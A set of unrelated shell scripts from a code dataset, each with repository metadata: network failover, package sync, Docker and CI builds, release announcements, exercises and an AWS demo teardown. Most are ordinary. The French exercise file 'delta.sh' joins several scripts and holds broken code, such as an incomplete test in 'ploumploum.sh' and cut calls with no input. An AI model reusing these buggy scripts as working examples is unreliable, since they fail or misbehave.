        ppp0=1
        log "ppp0 is up and routing exists"
    else # ppp0 is down
        ppp0=0
        log "ppp0 is down."
    fi

    # Status summary for the console.
    if [[ $eth0 -eq 1 ]] && [[ $ppp0 -eq 1 ]]
    then
        echo "eth0 is UP and ppp0 is UP"
    fi
    if [[ $eth0 -eq 1 ]] && [[ $ppp0 -eq 0 ]]
    then
        echo "eth0 is UP and ppp0 is DOWN"
    fi
    if [[ $eth0 -eq 0 ]] && [[ $ppp0 -eq 0 ]]
    then
        echo "eth0 is DOWN and ppp0 is DOWN -> REBOOOOOOT"
    fi

    if [[ $eth0 -eq 0 ]] && [[ $ppp0 -eq 1 ]]
    then
        if [ $fallback -eq 0 ]
        then
            log "eth0 is down and routing via ppp0"
            # BUG FIX: en-dashes again, and "0.0.0/0" was missing an
            # octet — the 3G fallback default route was never installed.
            vtysh -c "show run" -c "conf t" -c "no ip route 0.0.0.0/0 94.70.239.209" -c "ip route 0.0.0.0/0 10.64.64.64" -c "end" -c "show run" > /dev/null
            fallback=1
            # kill VPN
            log "Killing VPN"
            service openvpn stop >/dev/null 2>&1
            kill $(pidof openvpn)
            killall openvpn # just to be REALLY CERTAIN
            sleep 2
            # Restart VPN
            log "Restart VPN"
            sudo /home/pi/startVPN.sh #> /dev/null
            sleep 30
        else
            log "not doing anything"
            echo $eth0
            echo $ppp0
        fi
    fi

    # BUG FIX: was `status1=eth0` / `status2=ppp0` (assigning the literal
    # interface names); record the actual interface states instead.
    status1=$eth0
    status2=$ppp0
    sleep 10
done
| true |
1e53f4ce6ae94cebb3a2aa5b77f3a394bf147d61 | Shell | OpenCPN/plugins | /cloudsmith-sync.sh | UTF-8 | 714 | 3.515625 | 4 | [] | no_license | #!/bin/bash
set -euo pipefail

# Download every ".xml" metadata package matching QUERY from the given
# Cloudsmith repository into the local ./metadata directory.

if [ $# != 4 ]
then
    echo "Usage: $0 <project> <cloudsmith-user> <cloudsmith-repo> <tag/commit>"
    echo ""
    exit 2
fi

PROJECT="${1}"            # currently unused; kept for CLI compatibility
CLOUDSMITH_USER="${2}"
CLOUDSMITH_REPO="${3}"
QUERY="${4}"

cd metadata

api_url="https://api.cloudsmith.io/packages/${CLOUDSMITH_USER}/${CLOUDSMITH_REPO}/?page_size=9999&query=${QUERY}"
filter='.[] | select(.extension == ".xml") | .cdn_url'

for url in $(curl -s -S "$api_url" | jq -r "$filter")
do
    printf '%s\n' "$url"
    # Overwrites any existing file of the same name.
    curl -s -S -o "$(basename "$url")" "$url"
done
| true |
28ac0816c686bc9de38b012aca8a844dc5e5d090 | Shell | skhatri/dse-cassandra-wrapped | /run.sh | UTF-8 | 1,013 | 2.734375 | 3 | [] | no_license | #!/usr/bin/env bash
# Launch a read-only DataStax Enterprise container; every location the
# server must write to (config, data, logs, tmp) is bind-mounted from a
# freshly created ./volumes tree.
. ./clean.sh

# Quoting $(pwd) fixes breakage when the working directory contains spaces
# (the original expanded it unquoted); "rm -rf" already succeeds when the
# directory is absent, so the prior existence test was redundant.
vol="$(pwd)/volumes"
rm -rf "$vol"
mkdir -p "$vol"/{lib-cassandra,lib-dsefs,lib-spark,log-cassandra,log-spark,conf-cassandra,conf-dse,conf-spark,bin-dse,collectd-dse,config,tmp,.cassandra}

# To disable DSE auto-configuration add: -e DSE_AUTO_CONF_OFF=all
docker run \
	--read-only \
	--name dse \
	-v "$vol"/conf-cassandra:/opt/dse/resources/cassandra/conf \
	-v "$vol"/conf-spark:/opt/dse/resources/spark/conf \
	-v "$vol"/conf-dse:/opt/dse/resources/dse/conf \
	-v "$vol"/collectd-dse:/opt/dse/resources/dse/collectd \
	-v "$vol"/bin-dse:/opt/dse/bin \
	-v "$vol"/lib-cassandra:/var/lib/cassandra \
	-v "$vol"/lib-dsefs:/var/lib/dsefs \
	-v "$vol"/lib-spark:/var/lib/spark \
	-v "$vol"/log-cassandra:/var/log/cassandra \
	-v "$vol"/log-spark:/var/log/spark \
	-v "$vol"/config:/config \
	-v "$vol"/tmp:/tmp \
	-v "$vol"/.cassandra:/opt/dse/.cassandra \
	-p 9042:9042 \
	-dt dse-server:latest
| true |
ad1cbb8a55491a4b8dd7d8c4a7a381e87781607a | Shell | cmlesquivel/holberton-system_engineering-devops | /0x04-loops_conditions_and_parsing/9-to_file_or_not_to_file | UTF-8 | 739 | 3.578125 | 4 | [] | no_license | #!/usr/bin/env bash
# Bash script that gives you information about the holbertonschool file
file="holbertonschool"

if [ ! -e "$file" ]
then
    echo "holbertonschool file does not exist"
else
    echo "holbertonschool file exists"
    # -s: true when the file exists with a size greater than zero.
    if [ -s "$file" ]
    then
        echo "holbertonschool file is not empty"
    else
        echo "holbertonschool file is empty"
    fi
    # -f: true when it is a regular file (not a directory, device, ...).
    if [ -f "$file" ]
    then
        echo "holbertonschool is a regular file"
    fi
fi
# (( counter++ )) | true |
ab5ee0c91030dfeea0f0507a5d5a064009e98114 | Shell | pdp7/fomu-workshop | /.github/tests.sh | UTF-8 | 1,707 | 2.96875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e

# Locate the unpacked toolchain directory (fomu-toolchain-*) and put its
# bin/ first on PATH.  -maxdepth is placed before the tests so GNU find
# does not warn about option ordering.
TOOLCHAIN_PATH="$PWD/$(find fomu-toolchain-* -maxdepth 0 -type d 2>/dev/null)"
echo "TOOLCHAIN_PATH: $TOOLCHAIN_PATH"
export PATH=$TOOLCHAIN_PATH/bin:$PATH

# Build one example and check the expected artifact with file(1).
# travis_fold / travis_time_start / travis_time_finish are provided by the
# CI environment.
#   $1 fold tag          $2 human-readable description
#   $3 build directory   $4 artifact to inspect
#   remaining args: the build command to run inside $3.
run_example() {
    local fold=$1 desc=$2 dir=$3 artifact=$4
    shift 4
    travis_fold start "$fold"
    echo "$desc"
    travis_time_start
    (
        set -x
        cd "$dir"
        "$@"
        file "$artifact"
    )
    travis_time_finish
    travis_fold end "$fold"
}

# Test the RISC-V C example
run_example riscv-c "RISC-V C Example" riscv-blink riscv-blink.dfu make

# Test the Verilog Blink example
run_example verilog-blink "Verilog Blink example" verilog/blink blink.dfu make FOMU_REV=pvt

# Test the Verilog Blink (expanded) example for both board revisions
run_example verilog-blink-expanded-hacker "Verilog Blink (expanded) example for Hacker board" verilog/blink-expanded blink.dfu make FOMU_REV=hacker
run_example verilog-blink-expanded-pvt "Verilog Blink (expanded) example for PVT board" verilog/blink-expanded blink.dfu make FOMU_REV=pvt

# Test the LiteX example for both board revisions
run_example litex-hacker "LiteX example for Hacker" litex build/gateware/top.dfu ./workshop.py --board=hacker
run_example litex-pvt "LiteX example for PVT" litex build/gateware/top.dfu ./workshop.py --board=pvt
| true |
d46cd7994a81e8414f5167e159da017361820ad2 | Shell | openstack/releases | /tools/announce.sh | UTF-8 | 6,631 | 3.46875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# Script to generate a release announcement for a project.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
set -e
if [ $# -lt 1 ]; then
    echo "Usage: $0 path-to-repository [version]"
    echo
    echo "Example: $0 ~/repos/openstack/oslo.rootwrap"
    echo "Example: $0 ~/repos/openstack/oslo.rootwrap 3.0.3"
    exit 2
fi
# Trace every command from here on (useful in CI logs).
set -x
# Directory holding this script; 'functions' provides helpers such as
# setup_temp_space and get_last_tag used below.
TOOLSDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source $TOOLSDIR/functions
RELEASESDIR=$(realpath $TOOLSDIR/..)
# Resolve the repository argument to an absolute path.
REPODIR=$(cd $1 && pwd)
VERSION=$2
# If the version looks like an alpha or beta, ignore it. The script
# for producing release notes has templates for regular releases and
# release candidates.
if [[ $VERSION =~ (a|b) ]]; then
    echo "No announcements are generated for alpha or beta releases."
    exit 0
fi
# The repository directory may be named something other than what the
# repository is, if we're running under CI or someone has checked it
# out locally to an alternate name. Use the git remote URL as a source
# of better information for the real repository name.
REMOTE_URL=$(cd $REPODIR && git config --get remote.origin.url || echo "")
if [ ! -z "$REMOTE_URL" ] && [ "$REMOTE_URL" != "file:///dev/null" ]; then
    # Make sure .git extensions are not included
    SHORTNAME=$(basename $REMOTE_URL .git)
else
    # WARNING(dhellmann): This formulation only works in CI where the
    # workspace structure matches the git repo names upstream.
    SHORTNAME=$(basename $REPODIR)
fi
# Assign a default "from" email address if one is not specified by the
# user's environment.
export EMAIL=${EMAIL:-no-reply@openstack.org}
if [[ -z "$VIRTUAL_ENV" ]]; then
    if ! (cd $RELEASESDIR && tox -e venv --notest); then
        echo "Failed to build virtualenv"
        exit 1
    fi
    source $RELEASESDIR/.tox/venv/bin/activate
fi
# Make our output directory before we start moving around into
# temporary directories.
RELNOTESDIR="$PWD/relnotes"
mkdir -p $RELNOTESDIR
# Set up temporary directory for scratch files
setup_temp_space announce-$SHORTNAME
cd $REPODIR
# Determine the most recent tag if we weren't given a value.
if [[ -z "$VERSION" ]]; then
    VERSION=$(get_last_tag)
fi
# Look for the previous version on the same branch. If the command
# fails because there are no other tags, we will produce the entire
# history.
PREVIOUS_VERSION=$(git describe --abbrev=0 ${VERSION}^ 2>/dev/null || echo "")
if [[ "$PREVIOUS_VERSION" = "" ]]; then
    # There was no previous tag, so we're looking for the full history
    # of the project.
    PREVIOUS_VERSION=$(git rev-list --max-parents=0 HEAD | tail -1)
    first_release="--first-release"
fi
# Extract the tag message by parsing the git show output, which looks
# something like:
#
# tag 2.0.0
# Tagger: Doug Hellmann <doug@doughellmann.com>
# Date:   Tue Dec 1 21:45:44 2015 +0000
#
# python-keystoneclient 2.0.0 release
#
# meta:version: 2.0.0
# meta:series: mitaka
# meta:release-type: release
# -----BEGIN PGP SIGNATURE-----
# Comment: GPGTools - http://gpgtools.org
#
# iQEcBAABAgAGBQJWXhUIAAoJEDttBqDEKEN62rMH/ihLAGfw5GxPLmdEpt7gsLJu
# ...
#
TAG_META=$(git show --no-patch "$VERSION" | grep '^meta:' || true)
if [[ -z "$TAG_META" ]]; then
    echo "WARNING: Missing meta lines in $VERSION tag message,"
    echo "         skipping announcement."
    echo
    echo "Was the tag for $VERSION created with release.sh?"
    exit 0
fi
# Print the value of a single "meta:<fieldname>:" line from TAG_META.
function get_tag_meta {
    typeset fieldname="$1"
    echo "$TAG_META" | grep "^meta:$fieldname:" | sed "s/meta:$fieldname: *//"
}
# How far back should we look for release info? If there is no
# explicit metadata (signaled by passing "-"), use whatever previous
# version number we were able to detect.
DIFF_START=$(get_tag_meta diff-start)
if [[ "$DIFF_START" == "-" ]]; then
    DIFF_START="$PREVIOUS_VERSION"
fi
# The series name is part of the commit message left by release.sh.
SERIES=$(get_tag_meta series)
# The type of release this is.
RELEASETYPE=$(get_tag_meta release-type)
# Figure out if that series is a stable branch or not. We don't
# release pre-releases on stable branches, so we only need to check
# for stable if the release type is a normal release.
if [[ $RELEASETYPE = "release" ]]; then
    if git branch -a | grep -q origin/stable/$SERIES; then
        stable="--stable"
    fi
fi
# If this is the first full release in a series, it isn't "stable"
# yet.
FIRST_FULL=$(get_tag_meta first)
if [[ $FIRST_FULL = "yes" ]]; then
    stable=""
fi
# Only include the PyPI link if we are told to.
INCLUDE_PYPI_LINK=$(get_tag_meta pypi)
if [[ "$INCLUDE_PYPI_LINK" == "yes" ]]; then
    include_pypi_link="--include-pypi-link"
fi
echo "$DIFF_START to $VERSION on $SERIES"
relnotes_file="$RELNOTESDIR/$SHORTNAME-$VERSION"
# As we use importlib to retrieve information we have to pass the
# importable name of the module, example: oslo.messaging => oslo_messaging
modified_shortname=${SHORTNAME//\./_}
# ensure that the package is a valid package that can be imported by
# importlib.metadata
python -m pip install .
project_name=$(python -c "import importlib.metadata; print(importlib.metadata.metadata('${modified_shortname}')['Name'])" || true)
if [ -n "${project_name}" ] ; then
    description=$(python -c "import importlib.metadata; print(importlib.metadata.metadata('${modified_shortname}')['Summary'])")
else
    # As a last resort, guess that the project name may be the same as that
    # of the local working directory at the point this script is invoked.
    project_name="$(basename $(pwd))"
fi
# If we are running in the context of a Zuul CI system,
# we can just infer the project name from the repo name it supplies.
if [ -n "$ZUUL_PROJECT" ] ; then
    project_name="$(basename ${ZUUL_PROJECT})"
fi
echo
echo "Generating email body in $relnotes_file"
release-notes \
    --email \
    --series "$SERIES" \
    $stable \
    $first_release \
    --publishing-dir-name "$SHORTNAME" \
    . "$project_name" "$DIFF_START" "$VERSION" \
    $include_pypi_link \
    --description "$description" \
    | tee $relnotes_file
echo
echo "Sending release announcement"
send-mail -v $relnotes_file
| true |
fc1dc77b775e3851b9328824fe83e6b9125cb02f | Shell | vifino/.files | /.mutt/acc-cgen | UTF-8 | 395 | 3.671875 | 4 | [] | no_license | #!/bin/sh
# Generate the mutt macro list for switching accounts: one macro (A1, A2,
# ...) per account file in ~/.mutt/accs.d, then switch to the default
# account.

# Vars
ACC_SWITCH=~/.mutt/acc-switch

echo "# Macros for switching."
i=1
for f in ~/.mutt/accs.d/*.muttrc ; do
	# Account name = filename without the ".muttrc" suffix.  basename's
	# suffix-stripping operand replaces the old "rev | cut | rev"
	# pipeline and yields the same result for every *.muttrc match.
	AN=$(basename "$f" .muttrc)
	cat <<MCRO
macro index A$i "<enter-command>source 'exec $ACC_SWITCH $AN|'<enter>" "show account $AN"
MCRO
	i=$((i+1))
done
echo

# Invoke for default.
exec "$ACC_SWITCH"
| true |
6a4d6afc6336d2789118193c829b7d691eccae41 | Shell | Dc-cpu-arch/holberton-system_engineering-devops | /0x0C-web_server/0-transfer_file | UTF-8 | 246 | 3.421875 | 3 | [] | no_license | #!/usr/bin/env bash
# Transfer a file from our client to a server with scp.
# Expected arguments: PATH_TO_FILE IP USERNAME PATH_TO_SSH_KEY
if [[ $# -eq 4 ]]
then
	scp -o StrictHostKeyChecking=no -i "$4" "$1" "$3@$2":~/
else
	echo "Usage: 0-trnasfer_file PATH_TO_FILE IP USERNAME PATH_TO_SSH_KEY"
fi
| true |
8ff613e78d2e0c90b94e0b3535012488191de3b7 | Shell | TaylanUB/misc | /bin/rpm2cpio | UTF-8 | 695 | 3.046875 | 3 | [] | no_license | #!/bin/sh
# Extract the cpio payload of an RPM package to stdout.
# RPM layout: 96-byte lead, signature header, main header, then the
# (compressed) cpio archive.  The script computes the total size of
# everything preceding the archive and skips past it with dd.
if [ $# -ne 1 ]
then
	echo >&2 'Usage: rpm2cpio <filename>'
	exit
fi

if [ -t 1 ]
then
	echo >&2 'shamelessly refusing to write to terminal'
	exit
fi

pkg=$1

leadsize=96
# Skip the lead plus the signature header's 8-byte preamble; the next 8
# bytes hold its index-entry count and data-section length.
o=$(( $leadsize + 8 ))
# od prints the bytes as unsigned decimals; "set --" makes them $2..$9
# ($1 is od's offset column).
set -- $(od -j $o -N 8 -t u1 "$pkg")
# Reassemble two big-endian 32-bit values: il = index entries, dl = size
# of the data section.
il=$(( 256 * ( 256 * ( 256 * $2 + $3 ) + $4 ) + $5 ))
dl=$(( 256 * ( 256 * ( 256 * $6 + $7 ) + $8 ) + $9 ))
# Signature header: 8 count/length bytes + 16 bytes per index entry + data.
sigsize=$(( 8 + 16 * $il + $dl))
# The signature header is padded up to an 8-byte boundary; then skip the
# main header's 8-byte preamble the same way and read its il/dl.
o=$(( $o + $sigsize + ( 8 - ( $sigsize % 8 ) ) % 8 + 8))
set -- $(od -j $o -N 8 -t u1 "$pkg")
il=$(( 256 * ( 256 * ( 256 * $2 + $3 ) + $4 ) + $5))
dl=$(( 256 * ( 256 * ( 256 * $6 + $7 ) + $8 ) + $9))
hdrsize=$(( 8 + 16 * $il + $dl ))
o=$(( $o + $hdrsize ))

# Everything from offset o onward is the payload; ibs=$o skip=1 skips
# exactly o bytes in a single input block.
dd if="$pkg" ibs=$o skip=1 2>/dev/null
| true |
2e2c438763daeef754864b7fc6d3ba605a725afb | Shell | rhnkrnwt/armory | /docker/build.sh | UTF-8 | 1,814 | 4.15625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Build a docker image for specific framework. Optionally `all` frameworks can be built.
# Ex: `bash docker/build.sh pytorch`
if [ "$#" -ne 1 ]; then
    echo "Please pass a single argument to specify which framework to build. Must be either \`tf1\`, \`tf2\` or \`pytorch\` or \`all\`"
    exit 1
fi

# Parse framework argument
if [[ "$1" != "pytorch" && "$1" != "tf1" && "$1" != "tf2" && "$1" != "all" ]]; then
    echo "Framework argument must be either \`tf1\`, \`tf2\` or \`pytorch\` or \`all\`"
    exit 1
fi

# Parse Version
version=$(python -m armory --version)
if [[ $version == *"-dev" ]]; then
    echo "Armory version $version is a '-dev' branch. To build docker images, use:"
    echo "bash docker/build-dev.sh"
    exit
fi

# Build images.  For each framework three images are produced: the shared
# armory base image, the framework base image, and the framework dev image.
if [[ "$1" == "all" ]]; then
    echo "Building docker images for all frameworks..."
    # The shared base image is framework-independent, so build it once
    # instead of rebuilding it on every loop iteration as before.
    docker build --force-rm --file docker/Dockerfile --target armory -t twosixarmory/armory:${version} .
    for framework in "tf1" "tf2" "pytorch"; do
        docker build --force-rm --file docker/${framework}/Dockerfile --build-arg armory_version=${version} --target armory-${framework}-base -t twosixarmory/${framework}-base:${version} .
        docker build --force-rm --file docker/${framework}-dev/Dockerfile --build-arg armory_version=${version} --target armory-${framework}-dev -t twosixarmory/${framework}:${version} .
    done
else
    docker build --force-rm --file docker/Dockerfile --target armory -t twosixarmory/armory:${version} .
    docker build --force-rm --file docker/${1}/Dockerfile --build-arg armory_version=${version} --target armory-${1}-base -t twosixarmory/${1}-base:${version} .
    docker build --force-rm --file docker/${1}-dev/Dockerfile --build-arg armory_version=${version} --target armory-${1}-dev -t twosixarmory/${1}:${version} .
fi
| true |
f8f1fe7a6e50b39a0452cd5328a2d829b8bdd8b1 | Shell | fcnorman/wolf | /data.provider/src/3.schedule.today.sh | UTF-8 | 930 | 3.578125 | 4 | [] | no_license | #!/bin/bash
# Stream today's tick rows for SYMBOL out of the previous month's HistData
# CSV into the provider script, running in the background and logging to
# $PATH_TO_LOG/$SYMBOL.log.  Requires WOLF_DATA_PROVIDER_HOME and
# WOLF_HISTDATA_HOME to be set.
if [ -z "$WOLF_DATA_PROVIDER_HOME" ]; then
  echo variable WOLF_DATA_PROVIDER_HOME undefined
  exit 1
fi

if [ -z "$WOLF_HISTDATA_HOME" ]; then
  echo variable WOLF_HISTDATA_HOME undefined
  exit 1
fi

if [ $# -ne 1 ]
then
  echo "usage: $(basename $0) SYMBOL"
  exit 1
fi

CAT=/bin/cat
PYTHON=/usr/bin/python

PATH_TO_CSV=$WOLF_HISTDATA_HOME/data/csv
PATH_TO_SRC=$WOLF_DATA_PROVIDER_HOME/src
PATH_TO_LOG=$WOLF_DATA_PROVIDER_HOME/log

# All date components are computed in US Eastern time.
CURR_MONTH=$(TZ="EST" date +"%m")
PREV_MONTH=$(TZ="EST" date +"%m" --date="1 month ago")
CURR_DAY=$(TZ="EST" date +"%d")
# NOTE(review): NEXT_DAY and CURR_HOUR are computed but never used below.
NEXT_DAY=$(TZ="EST" date +"%d" --date="next day")
CURR_HOUR=$(TZ="EST" date +"%H")
CURR_YEAR=$(TZ="EST" date +"%Y")

SYMBOL=$1

# Select the rows timestamped with today's date and feed them, unbuffered,
# to 2.provider.py; stdout+stderr are appended to the per-symbol log.
${CAT} ${PATH_TO_CSV}/DAT_ASCII_${SYMBOL}_T_${CURR_YEAR}${PREV_MONTH}.csv | grep ^${CURR_YEAR}${PREV_MONTH}${CURR_DAY} | $PYTHON -u $PATH_TO_SRC/2.provider.py $SYMBOL $CURR_MONTH $CURR_DAY &>> $PATH_TO_LOG/$SYMBOL.log &
| true |
74256fc25f6d5d0e94ca1b3e88ddac4ab291c361 | Shell | samuelcolvin/init-desktop | /mktouch | UTF-8 | 87 | 2.546875 | 3 | [] | no_license | #!/usr/bin/env bash
# mktouch: like touch(1), but creates any missing parent directories first.
set -e
FILE_PATH=$1
# Quote both expansions so paths containing spaces or glob characters work
# (the originals were unquoted), and use $(...) instead of legacy backticks.
mkdir -p "$(dirname "$FILE_PATH")"
touch "$FILE_PATH"
| true |
f151fb3b7372781754806274837137665830405c | Shell | jlefebvre94/test-bash | /delta.sh | UTF-8 | 4,815 | 3.71875 | 4 | [] | no_license | #!/bin/bash
ARG1=${1:?"Erreur : vous devez indiquer le nom du fichier a renommer"}
EXTFICHIER=$(echo | cut -d . -f 2-)
CORPSFICHIER=$(echo | cut -d . -f 1)
mv $ARG1 ${CORPSFICHIER}_alice.$EXTFICHIER
******************************************************* #exo1.sh
#!/bin/bash
[ $# -eq 3 -a "$1" != "$2" -a "$1" != "$3" -a "$2" != "$3" -a "$1" \< "$2" -a "$2" \< "$3" ]
********************************************************************************* #exo2.sh
#!/bin/bash
[ -f "$1" -a $# -ge 1 -a ! -w "$1" ]
************************************************************************************ #exo3.sh
#!/bin/bash
[[ $# -ge 1 && $1 == *X* && $1 == *Y* ]]
**************************************** #ouinon.sh
#!/bin/bash
[[ $# -lt 1 ]] && echo "Vous n'avez pas donné votre réponse" && exit 3 \
|| [[ $# -gt 1 ]] && echo "Donnez une seule réponse" && exit 4 \
|| [[ $1 == o || $1 == O ]] && echo "oui" && exit 0 \
|| [[ $1 == n || $1 == N ]] && echo "non" && exit 1 \
|| echo "Pas compris" && exit 5
*****************************************
#!/bin/bash
## fichier : testargu.sh
if [[ $# -eq 2 ]]
then
if [[ ! -f $1 || ! -r $1 || ! -w $1 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 4
elif [[ ! -d $2 || ! -x $2 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 5
else
echo "999"
fi
elif [[ $# -eq 3 ]]
then
if [[ ! -f $1 || ! -r $1 || ! -w $1 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 4
elif [[ ! -d $2 || ! -x $2 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 5
elif [[ $3 -lt 1 ]]
then
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 6
else
echo $3
fi
else
echo "usage : testargu.sh fichier repertoire [nombre_positif ]"
exit 3
fi
*******************************************************
##!/bin/bash
## fichier : unetouche.sh
if [[ $# -ne 1 ]]
then
echo "Donner exactement un argument"
exit 90
fi
case $1 in
[a-z])
echo "Minuscule"
exit 10
;;
[A-Z])
echo "Majuscule"
exit 11
;;
[0-9])
echo "Chiffre"
exit 12
;;
?)
echo "Autre"
exit 20
;;
*)
echo "Donner un seul caractère"
exit 91
;;
esac
*******************************************************
#!/bin/bash
## fichier : size.sh
declare -i i=0 #pour numeroter chaque iteration
if [ $# -eq 0 ] ; then # argument manquant
echo " Usage: $0 file" >&2
exit 1
fi
if ! [ -f $1 ] ; then
echo "Erreur: fichier $@ non existant" >&2
exit 1
fi
for field in $(ls -l $1); do
# echo "$i -> $field" #affichage pour trouver la
#position recherchee
if [ $i -eq 4 ] # no de la position de la taille
then # sur la ligne
echo $field # taille du fichier
break
fi
i=$((i+1))
done
exit 0
######################################
*****************************************************
#!/bin/bash
## fichier : size_movie_mkv.sh
declare -i total=0 #taille total
for fichier in $(ls /home/alice/Movies/*.mkv)
do
taille=$((taille+$(size.sh $fichier)))
done
echo $taille
##################################
****************************************************
#!/bin/bash
## fichier : format_size.sh ###
# taille en octets à formater
taille=${1:?"Erreur: il manque la taille en argument"}
# constantes
KIO=1024 # 1 Kio
MIO=$((1024*$KIO)) # 1 Mio
GIO=$((1024*$MIO)) # 1 Gio
# calcul du nombre W de Gio
W=0
while [ $taille -ge $GIO ] ; do
W=$(($W + 1)) # 1 Gio de plus
taille=$(($taille - $GIO)) #taille restante moins 1 Gio
done
X=0
while [ $taille -ge $MIO ] ; do
X=$(($X + 1)) # 1 Gio de plus
taille=$(($taille - $MIO)) #taille restante moins 1 Mio
done
Y=0
while [ $taille -ge $KIO ] ; do
Y=$(($Y + 1)) # 1 Gio de plus
taille=$(($taille - $KIO)) #taille restante moins 1 Kio
done
Z=$taille
echo "$W Gio $X Mio $Y Kio $Z octets"
***********************************************************
#!/bin/bash
## fichier : ploumploum.sh ###
alea() {
nb=$(($RANDOM % ($1 +1)))
return $nb
}
selecteur() {
NUM=1
for V in $($@ + 1) ; do
if [[ $NUM -eq $1
echo "argument $NUM = $V"
fi
NUM=$(( $NUM + 1 ))
done
alea $# ; selecteur $? $@
} | true |
50d59fcc5b7324ed193315c12e53c2eab54243bb | Shell | shakerin007/rtg_development | /Others/html X/scripts/do_agent | UTF-8 | 2,557 | 3.25 | 3 | [] | no_license | #!/bin/bash
#--------------------------------------- How to use it ------------------------------------------------------#
# this script will create an agent and lower classes(monitor,driver,sequencer etc.) based on given arguments
# this script is written only for using from other scripts
# it should not be used from terminal
#------------------------------------------------------------------------------------------------------------#
env_file=${1:-default_env.sv};
agent_file=${2:-default_agent.sv};
agent_class=${3:-default_agent};
agent_ins=${4:-default_agent_ins};
driver_file=${5:-driver.sv}
driver_class=${6:-default_driver}
driver_ins=${7:-driver}
monitor_file=${8:-monitor.sv}
monitor_class=${9:-default_monitor};
shift;
monitor_ins=${9:-monitor};
shift;
agent_port=${9:-a_port};
shift;
mon_port=${9:-mon_port};
shift;
sequencer_file=${9:-sequencer.sv}
shift;
sequencer_class=${9:-default_sequencer};
shift;
sequencer_ins=${9:-sequencer};
shift;
sequence_file=${9:-sequence.sv}
shift;
sequence_class=${9:-default_sequence};
shift;
sequence_ins=${9:-sequence_ins};
shift;
sequence_item_file=${9:-sequence_item.sv}
shift;
sequence_item_class=${9:-trans}
shift;
sequence_item_ins=${9:-trans_ins}
shift;
virtual_sequencer_file=${9:-default_vsequencer.sv};
shift;
virtual_sequencer_class=${9:-default_vsequencer};
shift;
virtual_sequence_file=${9:-default_vsequence.sv};
shift;
virtual_sequence_class=${9:-default_vsequence};
shift
mon_active=${9:-PASSIVE};
shift;
active=${9:-ACTIVE};
shift;
destination=${9:-mydir};
../scripts/create_agent $agent_class $agent_ins $active $env_file $destination> $destination/$agent_file
../scripts/create_agent_port $agent_file $agent_port $sequence_item_class $destination
../scripts/create_driver $driver_class $driver_ins $sequence_item_class $sequence_item_ins $active $agent_file $destination> $destination/$driver_file
../scripts/do_monitor $monitor_class $monitor_ins $sequence_item_class $sequence_item_ins $agent_port $mon_port $mon_active $agent_file $monitor_file $destination
../scripts/do_sequencer $sequencer_class $sequencer_ins $virtual_sequencer_file $virtual_sequencer_class $driver_ins $agent_file $agent_class $agent_ins $active $sequencer_file $env_file $destination
../scripts/create_sequence $sequence_class $sequence_ins $sequencer_class $sequencer_ins $sequence_item_class $sequence_item_ins $virtual_sequence_file $destination> $destination/$sequence_file
../scripts/create_seq_item $sequence_item_class > $destination/$sequence_item_file
| true |
d1a5f86364d9cc6add01c7078615adb2ab9f903c | Shell | mandeeps708/scripts | /screenshot/screenshot3.sh | UTF-8 | 389 | 2.84375 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#This script takes the screenshot of area selected by two mouse clicks and
#saves it in a folder say ~/Desktop/screenshots. This location can be modified
#by changing the path variable below. Add shortcut to this script in the
#System Settings> Keyboard shortcuts.

path=~/Desktop/screenshots
# Quote expansions (they were unquoted) and use $(...) instead of backticks.
mkdir -p "$path"
# NOTE(review): %I is the 12-hour clock, so shots taken 12 hours apart get
# the same name; %H or a date component would be safer -- kept to preserve
# the existing filename scheme.
gnome-screenshot --file="$path/Myscreenshot$(date +%I.%M.%S).png" -B -a
| true |
2958fbbd1b87dfa5e586f2abef05db6488635346 | Shell | humbertodosreis/DoCaaS | /demos/reset-presentation.sh | UTF-8 | 2,170 | 3.203125 | 3 | [] | no_license | #!/bin/bash
# Tear down the demo deployment: detach/delete the IAM policies, delete the
# Amplify, SAM and DynamoDB CloudFormation stacks, and reset the local repo.
. ./loadvariables.sh
# Get User Pool ID
cd ..
A=`grep "IdentityPoolId" multi-tenant-app/amplify/backend/amplify-meta.json`
# Wrap the grepped '"IdentityPoolId": "...",' line in braces (the dummy "t"
# key keeps the trailing comma valid JSON) and let jq extract the value.
IDENTITYPOOLID=`echo "{ $A \"t\":1 }" | jq ".IdentityPoolId" --raw-output`
echo "The Identity Pool Id is: $IDENTITYPOOLID"
sleep 5
# manually discard all changes in local repo (deletes all new local files and changes)
git reset --hard HEAD
git clean --force
rm -fr multi-tenant-app
git pull && cd demos
# Get RoleNameAuth
INPUT=`aws cognito-identity get-identity-pool-roles --identity-pool-id $IDENTITYPOOLID --query "Roles.authenticated" --output text`
ROLENAMEAUTH=${INPUT#*/} # remove prefix ending in "/"
echo $ROLENAMEAUTH
# Attach 2 policies to Authenticated Role
AWSACCOUNT=`aws sts get-caller-identity --output text --query 'Account'`
echo "The AWS Account is: $AWSACCOUNT"
aws iam detach-role-policy --role-name $ROLENAMEAUTH --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDynamoPolicyForAuthenticated
aws iam detach-role-policy --role-name $ROLENAMEAUTH --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDefaultPolicyForAuthenticated
# delete Amplify Stack
A=`aws cloudformation list-stacks --stack-status-filter UPDATE_COMPLETE | grep '"StackName": "multitenantapp'`
echo $A
# Same brace/jq trick as above to pull the stack name out of the grep hit.
STACKNAME=`echo "{ $A \"t\":1 }" | jq ".StackName" --raw-output`
echo "Amplify's Stack Name to delete is: $STACKNAME"
aws cloudformation delete-stack --stack-name $STACKNAME
# Delete docaas SAM stack
